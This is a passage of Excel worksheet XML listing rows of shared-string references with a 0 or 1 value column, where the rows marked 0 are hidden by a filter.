      <c r="C1324" s="1" t="s">
        <v>1168</v>
      </c>
      <c r="D1324" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1325" hidden="1">
      <c r="A1325" s="1">
        <v>1323.0</v>
      </c>
      <c r="B1325" s="1" t="s">
        <v>2323</v>
      </c>
      <c r="C1325" s="1" t="s">
        <v>2324</v>
      </c>
      <c r="D1325" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1326" hidden="1">
      <c r="A1326" s="1">
        <v>1324.0</v>
      </c>
      <c r="B1326" s="1" t="s">
        <v>2325</v>
      </c>
      <c r="C1326" s="1" t="s">
        <v>2326</v>
      </c>
      <c r="D1326" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="1">
        <v>1325.0</v>
      </c>
      <c r="B1327" s="1" t="s">
        <v>2327</v>
      </c>
      <c r="C1327" s="1" t="s">
        <v>2328</v>
      </c>
      <c r="D1327" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1328" hidden="1">
      <c r="A1328" s="1">
        <v>1326.0</v>
      </c>
      <c r="B1328" s="1" t="s">
        <v>975</v>
      </c>
      <c r="C1328" s="1" t="s">
        <v>976</v>
      </c>
      <c r="D1328" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1329" hidden="1">
      <c r="A1329" s="1">
        <v>1327.0</v>
      </c>
      <c r="B1329" s="1" t="s">
        <v>140</v>
      </c>
      <c r="C1329" s="1" t="s">
        <v>2329</v>
      </c>
      <c r="D1329" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1330" hidden="1">
      <c r="A1330" s="1">
        <v>1328.0</v>
      </c>
      <c r="B1330" s="1" t="s">
        <v>749</v>
      </c>
      <c r="C1330" s="1" t="s">
        <v>750</v>
      </c>
      <c r="D1330" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="1">
        <v>1329.0</v>
      </c>
      <c r="B1331" s="1" t="s">
        <v>2330</v>
      </c>
      <c r="C1331" s="1" t="s">
        <v>2331</v>
      </c>
      <c r="D1331" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1332" hidden="1">
      <c r="A1332" s="1">
        <v>1330.0</v>
      </c>
      <c r="B1332" s="1" t="s">
        <v>1764</v>
      </c>
      <c r="C1332" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="D1332" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1333" hidden="1">
      <c r="A1333" s="1">
        <v>1331.0</v>
      </c>
      <c r="B1333" s="1" t="s">
        <v>2333</v>
      </c>
      <c r="C1333" s="1" t="s">
        <v>2334</v>
      </c>
      <c r="D1333" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1334" hidden="1">
      <c r="A1334" s="1">
        <v>1332.0</v>
      </c>
      <c r="B1334" s="1" t="s">
        <v>1102</v>
      </c>
      <c r="C1334" s="1" t="s">
        <v>2335</v>
      </c>
      <c r="D1334" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="1">
        <v>1333.0</v>
      </c>
      <c r="B1335" s="1" t="s">
        <v>2336</v>
      </c>
      <c r="C1335" s="1" t="s">
        <v>2337</v>
      </c>
      <c r="D1335" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1336" hidden="1">
      <c r="A1336" s="1">
        <v>1334.0</v>
      </c>
      <c r="B1336" s="1" t="s">
        <v>298</v>
      </c>
      <c r="C1336" s="1" t="s">
        <v>299</v>
      </c>
      <c r="D1336" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1337" hidden="1">
      <c r="A1337" s="1">
        <v>1335.0</v>
      </c>
      <c r="B1337" s="1" t="s">
        <v>2338</v>
      </c>
      <c r="C1337" s="1" t="s">
        <v>2339</v>
      </c>
      <c r="D1337" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1338" hidden="1">
      <c r="A1338" s="1">
        <v>1336.0</v>
      </c>
      <c r="B1338" s="1" t="s">
        <v>2340</v>
      </c>
      <c r="C1338" s="1" t="s">
        <v>2341</v>
      </c>
      <c r="D1338" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1339" hidden="1">
      <c r="A1339" s="1">
        <v>1337.0</v>
      </c>
      <c r="B1339" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C1339" s="1" t="s">
        <v>1798</v>
      </c>
      <c r="D1339" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1340" hidden="1">
      <c r="A1340" s="1">
        <v>1338.0</v>
      </c>
      <c r="B1340" s="1" t="s">
        <v>2342</v>
      </c>
      <c r="C1340" s="1" t="s">
        <v>2343</v>
      </c>
      <c r="D1340" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="1">
        <v>1339.0</v>
      </c>
      <c r="B1341" s="1" t="s">
        <v>2344</v>
      </c>
      <c r="C1341" s="1" t="s">
        <v>2345</v>
      </c>
      <c r="D1341" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1342" hidden="1">
      <c r="A1342" s="1">
        <v>1340.0</v>
      </c>
      <c r="B1342" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C1342" s="1" t="s">
        <v>2346</v>
      </c>
      <c r="D1342" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="1">
        <v>1341.0</v>
      </c>
      <c r="B1343" s="1" t="s">
        <v>2347</v>
      </c>
      <c r="C1343" s="1" t="s">
        <v>2348</v>
      </c>
      <c r="D1343" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1344" hidden="1">
      <c r="A1344" s="1">
        <v>1342.0</v>
      </c>
      <c r="B1344" s="1" t="s">
        <v>2349</v>
      </c>
      <c r="C1344" s="1" t="s">
        <v>2350</v>
      </c>
      <c r="D1344" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1345" hidden="1">
      <c r="A1345" s="1">
        <v>1343.0</v>
      </c>
      <c r="B1345" s="1" t="s">
        <v>490</v>
      </c>
      <c r="C1345" s="1" t="s">
        <v>2351</v>
      </c>
      <c r="D1345" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="1">
        <v>1344.0</v>
      </c>
      <c r="B1346" s="1" t="s">
        <v>2352</v>
      </c>
      <c r="C1346" s="1" t="s">
        <v>2353</v>
      </c>
      <c r="D1346" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1347" hidden="1">
      <c r="A1347" s="1">
        <v>1345.0</v>
      </c>
      <c r="B1347" s="1" t="s">
        <v>2354</v>
      </c>
      <c r="C1347" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D1347" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1348" hidden="1">
      <c r="A1348" s="1">
        <v>1346.0</v>
      </c>
      <c r="B1348" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C1348" s="1" t="s">
        <v>2356</v>
      </c>
      <c r="D1348" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1349" hidden="1">
      <c r="A1349" s="1">
        <v>1347.0</v>
      </c>
      <c r="B1349" s="1" t="s">
        <v>140</v>
      </c>
      <c r="C1349" s="1" t="s">
        <v>2357</v>
      </c>
      <c r="D1349" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1350" hidden="1">
      <c r="A1350" s="1">
        <v>1348.0</v>
      </c>
      <c r="B1350" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="C1350" s="1" t="s">
        <v>2358</v>
      </c>
      <c r="D1350" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1351" hidden="1">
      <c r="A1351" s="1">
        <v>1349.0</v>
      </c>
      <c r="B1351" s="1" t="s">
        <v>1016</v>
      </c>
      <c r="C1351" s="1" t="s">
        <v>2359</v>
      </c>
      <c r="D1351" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1352" hidden="1">
      <c r="A1352" s="1">
        <v>1350.0</v>
      </c>
      <c r="B1352" s="1" t="s">
        <v>2360</v>
      </c>
      <c r="C1352" s="1" t="s">
        <v>2361</v>
      </c>
      <c r="D1352" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="1">
        <v>1351.0</v>
      </c>
      <c r="B1353" s="1" t="s">
        <v>2362</v>
      </c>
      <c r="C1353" s="1" t="s">
        <v>2363</v>
      </c>
      <c r="D1353" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="1">
        <v>1352.0</v>
      </c>
      <c r="B1354" s="1" t="s">
        <v>2364</v>
      </c>
      <c r="C1354" s="1" t="s">
        <v>2365</v>
      </c>
      <c r="D1354" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1355" hidden="1">
      <c r="A1355" s="1">
        <v>1353.0</v>
      </c>
      <c r="B1355" s="1" t="s">
        <v>2269</v>
      </c>
      <c r="C1355" s="1" t="s">
        <v>2366</v>
      </c>
      <c r="D1355" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="1">
        <v>1354.0</v>
      </c>
      <c r="B1356" s="1" t="s">
        <v>2367</v>
      </c>
      <c r="C1356" s="1" t="s">
        <v>2368</v>
      </c>
      <c r="D1356" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1357" hidden="1">
      <c r="A1357" s="1">
        <v>1355.0</v>
      </c>
      <c r="B1357" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C1357" s="1" t="s">
        <v>103</v>
      </c>
      <c r="D1357" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1358" hidden="1">
      <c r="A1358" s="1">
        <v>1356.0</v>
      </c>
      <c r="B1358" s="1" t="s">
        <v>577</v>
      </c>
      <c r="C1358" s="1" t="s">
        <v>578</v>
      </c>
      <c r="D1358" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1359" hidden="1">
      <c r="A1359" s="1">
        <v>1357.0</v>
      </c>
      <c r="B1359" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C1359" s="1" t="s">
        <v>2369</v>
      </c>
      <c r="D1359" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1360" hidden="1">
      <c r="A1360" s="1">
        <v>1358.0</v>
      </c>
      <c r="B1360" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="C1360" s="1" t="s">
        <v>2371</v>
      </c>
      <c r="D1360" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="1">
        <v>1359.0</v>
      </c>
      <c r="B1361" s="1" t="s">
        <v>2372</v>
      </c>
      <c r="C1361" s="1" t="s">
        <v>2373</v>
      </c>
      <c r="D1361" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="1">
        <v>1360.0</v>
      </c>
      <c r="B1362" s="1" t="s">
        <v>2374</v>
      </c>
      <c r="C1362" s="1" t="s">
        <v>2375</v>
      </c>
      <c r="D1362" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1363" hidden="1">
      <c r="A1363" s="1">
        <v>1361.0</v>
      </c>
      <c r="B1363" s="1" t="s">
        <v>829</v>
      </c>
      <c r="C1363" s="1" t="s">
        <v>2376</v>
      </c>
      <c r="D1363" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1364" hidden="1">
      <c r="A1364" s="1">
        <v>1362.0</v>
      </c>
      <c r="B1364" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="C1364" s="1" t="s">
        <v>2378</v>
      </c>
      <c r="D1364" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1365" hidden="1">
      <c r="A1365" s="1">
        <v>1363.0</v>
      </c>
      <c r="B1365" s="1" t="s">
        <v>1159</v>
      </c>
      <c r="C1365" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="D1365" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1366" hidden="1">
      <c r="A1366" s="1">
        <v>1364.0</v>
      </c>
      <c r="B1366" s="1" t="s">
        <v>2380</v>
      </c>
      <c r="C1366" s="1" t="s">
        <v>2381</v>
      </c>
      <c r="D1366" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1367" hidden="1">
      <c r="A1367" s="1">
        <v>1365.0</v>
      </c>
      <c r="B1367" s="1" t="s">
        <v>2382</v>
      </c>
      <c r="C1367" s="1" t="s">
        <v>2383</v>
      </c>
      <c r="D1367" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="1">
        <v>1366.0</v>
      </c>
      <c r="B1368" s="1" t="s">
        <v>2327</v>
      </c>
      <c r="C1368" s="1" t="s">
        <v>2328</v>
      </c>
      <c r="D1368" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1369" hidden="1">
      <c r="A1369" s="1">
        <v>1367.0</v>
      </c>
      <c r="B1369" s="1" t="s">
        <v>2384</v>
      </c>
      <c r="C1369" s="1" t="s">
        <v>2385</v>
      </c>
      <c r="D1369" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1370" hidden="1">
      <c r="A1370" s="1">
        <v>1368.0</v>
      </c>
      <c r="B1370" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C1370" s="1" t="s">
        <v>2386</v>
      </c>
      <c r="D1370" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1371" hidden="1">
      <c r="A1371" s="1">
        <v>1369.0</v>
      </c>
      <c r="B1371" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C1371" s="1" t="s">
        <v>2387</v>
      </c>
      <c r="D1371" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1372" hidden="1">
      <c r="A1372" s="1">
        <v>1370.0</v>
      </c>
      <c r="B1372" s="1" t="s">
        <v>2388</v>
      </c>
      <c r="C1372" s="1" t="s">
        <v>2389</v>
      </c>
      <c r="D1372" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1373" hidden="1">
      <c r="A1373" s="1">
        <v>1371.0</v>
      </c>
      <c r="B1373" s="1" t="s">
        <v>2390</v>
      </c>
      <c r="C1373" s="1" t="s">
        <v>2391</v>
      </c>
      <c r="D1373" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="1">
        <v>1372.0</v>
      </c>
      <c r="B1374" s="1" t="s">
        <v>2392</v>
      </c>
      <c r="C1374" s="1" t="s">
        <v>2393</v>
      </c>
      <c r="D1374" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1375" hidden="1">
      <c r="A1375" s="1">
        <v>1373.0</v>
      </c>
      <c r="B1375" s="1" t="s">
        <v>1995</v>
      </c>
      <c r="C1375" s="1" t="s">
        <v>2394</v>
      </c>
      <c r="D1375" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1376" hidden="1">
      <c r="A1376" s="1">
        <v>1374.0</v>
      </c>
      <c r="B1376" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="C1376" s="1" t="s">
        <v>2396</v>
      </c>
      <c r="D1376" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1377" hidden="1">
      <c r="A1377" s="1">
        <v>1375.0</v>
      </c>
      <c r="B1377" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C1377" s="1" t="s">
        <v>2397</v>
      </c>
      <c r="D1377" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1378" hidden="1">
      <c r="A1378" s="1">
        <v>1376.0</v>
      </c>
      <c r="B1378" s="1" t="s">
        <v>2398</v>
      </c>
      <c r="C1378" s="1" t="s">
        <v>2399</v>
      </c>
      <c r="D1378" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="1">
        <v>1377.0</v>
      </c>
      <c r="B1379" s="1" t="s">
        <v>2400</v>
      </c>
      <c r="C1379" s="1" t="s">
        <v>2401</v>
      </c>
      <c r="D1379" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1380" hidden="1">
      <c r="A1380" s="1">
        <v>1378.0</v>
      </c>
      <c r="B1380" s="1" t="s">
        <v>2402</v>
      </c>
      <c r="C1380" s="1" t="s">
        <v>2403</v>
      </c>
      <c r="D1380" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="1">
        <v>1379.0</v>
      </c>
      <c r="B1381" s="1" t="s">
        <v>2404</v>
      </c>
      <c r="C1381" s="1" t="s">
        <v>2405</v>
      </c>
      <c r="D1381" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="1">
        <v>1380.0</v>
      </c>
      <c r="B1382" s="1" t="s">
        <v>2406</v>
      </c>
      <c r="C1382" s="1" t="s">
        <v>2407</v>
      </c>
      <c r="D1382" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="1">
        <v>1381.0</v>
      </c>
      <c r="B1383" s="1" t="s">
        <v>2408</v>
      </c>
      <c r="C1383" s="1" t="s">
        <v>2409</v>
      </c>
      <c r="D1383" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="1">
        <v>1382.0</v>
      </c>
      <c r="B1384" s="1" t="s">
        <v>2410</v>
      </c>
      <c r="C1384" s="1" t="s">
        <v>2411</v>
      </c>
      <c r="D1384" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1385" hidden="1">
      <c r="A1385" s="1">
        <v>1383.0</v>
      </c>
      <c r="C1385" s="1" t="s">
        <v>518</v>
      </c>
      <c r="D1385" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1386" hidden="1">
      <c r="A1386" s="1">
        <v>1384.0</v>
      </c>
      <c r="B1386" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C1386" s="1" t="s">
        <v>2412</v>
      </c>
      <c r="D1386" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1387" hidden="1">
      <c r="A1387" s="1">
        <v>1385.0</v>
      </c>
      <c r="B1387" s="1" t="s">
        <v>2413</v>
      </c>
      <c r="C1387" s="1" t="s">
        <v>2414</v>
      </c>
      <c r="D1387" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1388" hidden="1">
      <c r="A1388" s="1">
        <v>1386.0</v>
      </c>
      <c r="B1388" s="1" t="s">
        <v>2415</v>
      </c>
      <c r="C1388" s="1" t="s">
        <v>2416</v>
      </c>
      <c r="D1388" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1389" hidden="1">
      <c r="A1389" s="1">
        <v>1387.0</v>
      </c>
      <c r="B1389" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C1389" s="1" t="s">
        <v>2417</v>
      </c>
      <c r="D1389" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="1">
        <v>1388.0</v>
      </c>
      <c r="B1390" s="1" t="s">
        <v>2418</v>
      </c>
      <c r="C1390" s="1" t="s">
        <v>2419</v>
      </c>
      <c r="D1390" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="1">
        <v>1389.0</v>
      </c>
      <c r="B1391" s="1" t="s">
        <v>2420</v>
      </c>
      <c r="C1391" s="1" t="s">
        <v>2421</v>
      </c>
      <c r="D1391" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1392" hidden="1">
      <c r="A1392" s="1">
        <v>1390.0</v>
      </c>
      <c r="B1392" s="1" t="s">
        <v>2422</v>
      </c>
      <c r="C1392" s="1" t="s">
        <v>2423</v>
      </c>
      <c r="D1392" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1393" hidden="1">
      <c r="A1393" s="1">
        <v>1391.0</v>
      </c>
      <c r="B1393" s="1" t="s">
        <v>2424</v>
      </c>
      <c r="C1393" s="1" t="s">
        <v>2425</v>
      </c>
      <c r="D1393" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1394" hidden="1">
      <c r="A1394" s="1">
        <v>1392.0</v>
      </c>
      <c r="B1394" s="1" t="s">
        <v>2426</v>
      </c>
      <c r="C1394" s="1" t="s">
        <v>2427</v>
      </c>
      <c r="D1394" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1395" hidden="1">
      <c r="A1395" s="1">
        <v>1393.0</v>
      </c>
      <c r="B1395" s="1" t="s">
        <v>2428</v>
      </c>
      <c r="C1395" s="1" t="s">
        <v>2429</v>
      </c>
      <c r="D1395" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1396" hidden="1">
      <c r="A1396" s="1">
        <v>1394.0</v>
      </c>
      <c r="B1396" s="1" t="s">
        <v>2430</v>
      </c>
      <c r="C1396" s="1" t="s">
        <v>2431</v>
      </c>
      <c r="D1396" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1397" hidden="1">
      <c r="A1397" s="1">
        <v>1395.0</v>
      </c>
      <c r="B1397" s="1" t="s">
        <v>2432</v>
      </c>
      <c r="C1397" s="1" t="s">
        <v>2433</v>
      </c>
      <c r="D1397" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="1">
        <v>1396.0</v>
      </c>
      <c r="B1398" s="1" t="s">
        <v>2434</v>
      </c>
      <c r="C1398" s="1" t="s">
        <v>2435</v>
      </c>
      <c r="D1398" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1399" hidden="1">
      <c r="A1399" s="1">
        <v>1397.0</v>
      </c>
      <c r="B1399" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C1399" s="1" t="s">
        <v>2436</v>
      </c>
      <c r="D1399" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1400" hidden="1">
      <c r="A1400" s="1">
        <v>1398.0</v>
      </c>
      <c r="B1400" s="1" t="s">
        <v>2437</v>
      </c>
      <c r="C1400" s="1" t="s">
        <v>2438</v>
      </c>
      <c r="D1400" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1401" hidden="1">
      <c r="A1401" s="1">
        <v>1399.0</v>
      </c>
      <c r="B1401" s="1" t="s">
        <v>2439</v>
      </c>
      <c r="C1401" s="1" t="s">
        <v>2440</v>
      </c>
      <c r="D1401" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1402" hidden="1">
      <c r="A1402" s="1">
        <v>1400.0</v>
      </c>
      <c r="B1402" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="C1402" s="1" t="s">
        <v>2442</v>
      </c>
      <c r="D1402" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1403" hidden="1">
      <c r="A1403" s="1">
        <v>1401.0</v>
      </c>
      <c r="B1403" s="1" t="s">
        <v>881</v>
      </c>
      <c r="C1403" s="1" t="s">
        <v>2443</v>
      </c>
      <c r="D1403" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1404" hidden="1">
      <c r="A1404" s="1">
        <v>1402.0</v>
      </c>
      <c r="B1404" s="1" t="s">
        <v>2444</v>
      </c>
      <c r="C1404" s="1" t="s">
        <v>2445</v>
      </c>
      <c r="D1404" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="1">
        <v>1403.0</v>
      </c>
      <c r="B1405" s="1" t="s">
        <v>2446</v>
      </c>
      <c r="C1405" s="1" t="s">
        <v>2447</v>
      </c>
      <c r="D1405" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1406" hidden="1">
      <c r="A1406" s="1">
        <v>1404.0</v>
      </c>
      <c r="B1406" s="1" t="s">
        <v>2448</v>
      </c>
      <c r="C1406" s="1" t="s">
        <v>2449</v>
      </c>
      <c r="D1406" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1407" hidden="1">
      <c r="A1407" s="1">
        <v>1405.0</v>
      </c>
      <c r="B1407" s="1" t="s">
        <v>2450</v>
      </c>
      <c r="C1407" s="1" t="s">
        <v>2451</v>
      </c>
      <c r="D1407" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1408" hidden="1">
      <c r="A1408" s="1">
        <v>1406.0</v>
      </c>
      <c r="B1408" s="1" t="s">
        <v>953</v>
      </c>
      <c r="C1408" s="1" t="s">
        <v>2452</v>
      </c>
      <c r="D1408" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1409" hidden="1">
      <c r="A1409" s="1">
        <v>1407.0</v>
      </c>
      <c r="B1409" s="1" t="s">
        <v>1118</v>
      </c>
      <c r="C1409" s="1" t="s">
        <v>2453</v>
      </c>
      <c r="D1409" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1410" hidden="1">
      <c r="A1410" s="1">
        <v>1408.0</v>
      </c>
      <c r="B1410" s="1" t="s">
        <v>1315</v>
      </c>
      <c r="C1410" s="1" t="s">
        <v>2454</v>
      </c>
      <c r="D1410" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="1">
        <v>1409.0</v>
      </c>
      <c r="B1411" s="1" t="s">
        <v>2455</v>
      </c>
      <c r="C1411" s="1" t="s">
        <v>2456</v>
      </c>
      <c r="D1411" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1412" hidden="1">
      <c r="A1412" s="1">
        <v>1410.0</v>
      </c>
      <c r="B1412" s="1" t="s">
        <v>2457</v>
      </c>
      <c r="C1412" s="1" t="s">
        <v>2458</v>
      </c>
      <c r="D1412" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1413" hidden="1">
      <c r="A1413" s="1">
        <v>1411.0</v>
      </c>
      <c r="B1413" s="1" t="s">
        <v>2459</v>
      </c>
      <c r="C1413" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="D1413" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1414" hidden="1">
      <c r="A1414" s="1">
        <v>1412.0</v>
      </c>
      <c r="B1414" s="1" t="s">
        <v>2461</v>
      </c>
      <c r="C1414" s="1" t="s">
        <v>2462</v>
      </c>
      <c r="D1414" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="1">
        <v>1413.0</v>
      </c>
      <c r="B1415" s="1" t="s">
        <v>2463</v>
      </c>
      <c r="C1415" s="1" t="s">
        <v>2464</v>
      </c>
      <c r="D1415" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1416" hidden="1">
      <c r="A1416" s="1">
        <v>1414.0</v>
      </c>
      <c r="B1416" s="1" t="s">
        <v>2465</v>
      </c>
      <c r="C1416" s="1" t="s">
        <v>2466</v>
      </c>
      <c r="D1416" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1417" hidden="1">
      <c r="A1417" s="1">
        <v>1415.0</v>
      </c>
      <c r="B1417" s="1" t="s">
        <v>885</v>
      </c>
      <c r="C1417" s="1" t="s">
        <v>2467</v>
      </c>
      <c r="D1417" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1418" hidden="1">
      <c r="A1418" s="1">
        <v>1416.0</v>
      </c>
      <c r="B1418" s="1" t="s">
        <v>2468</v>
      </c>
      <c r="C1418" s="1" t="s">
        <v>2469</v>
      </c>
      <c r="D1418" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1419" hidden="1">
      <c r="A1419" s="1">
        <v>1417.0</v>
      </c>
      <c r="B1419" s="1" t="s">
        <v>2470</v>
      </c>
      <c r="C1419" s="1" t="s">
        <v>2471</v>
      </c>
      <c r="D1419" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="1">
        <v>1418.0</v>
      </c>
      <c r="B1420" s="1" t="s">
        <v>2472</v>
      </c>
      <c r="C1420" s="1" t="s">
        <v>2473</v>
      </c>
      <c r="D1420" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1421" hidden="1">
      <c r="A1421" s="1">
        <v>1419.0</v>
      </c>
      <c r="B1421" s="1" t="s">
        <v>2045</v>
      </c>
      <c r="C1421" s="1" t="s">
        <v>2046</v>
      </c>
      <c r="D1421" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1422" hidden="1">
      <c r="A1422" s="1">
        <v>1420.0</v>
      </c>
      <c r="B1422" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C1422" s="1" t="s">
        <v>2474</v>
      </c>
      <c r="D1422" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1423" hidden="1">
      <c r="A1423" s="1">
        <v>1421.0</v>
      </c>
      <c r="B1423" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="C1423" s="1" t="s">
        <v>2476</v>
      </c>
      <c r="D1423" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1424" hidden="1">
      <c r="A1424" s="1">
        <v>1422.0</v>
      </c>
      <c r="B1424" s="1" t="s">
        <v>2477</v>
      </c>
      <c r="C1424" s="1" t="s">
        <v>2478</v>
      </c>
      <c r="D1424" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1425" hidden="1">
      <c r="A1425" s="1">
        <v>1423.0</v>
      </c>
      <c r="B1425" s="1" t="s">
        <v>2479</v>
      </c>
      <c r="C1425" s="1" t="s">
        <v>2480</v>
      </c>
      <c r="D1425" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1426" hidden="1">
      <c r="A1426" s="1">
        <v>1424.0</v>
      </c>
      <c r="B1426" s="1" t="s">
        <v>2481</v>
      </c>
      <c r="C1426" s="1" t="s">
        <v>2482</v>
      </c>
      <c r="D1426" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1427" hidden="1">
      <c r="A1427" s="1">
        <v>1425.0</v>
      </c>
      <c r="B1427" s="1" t="s">
        <v>2483</v>
      </c>
      <c r="C1427" s="1" t="s">
        <v>2484</v>
      </c>
      <c r="D1427" s="1">
        <v>0.0</v>
      </c>
    </row>
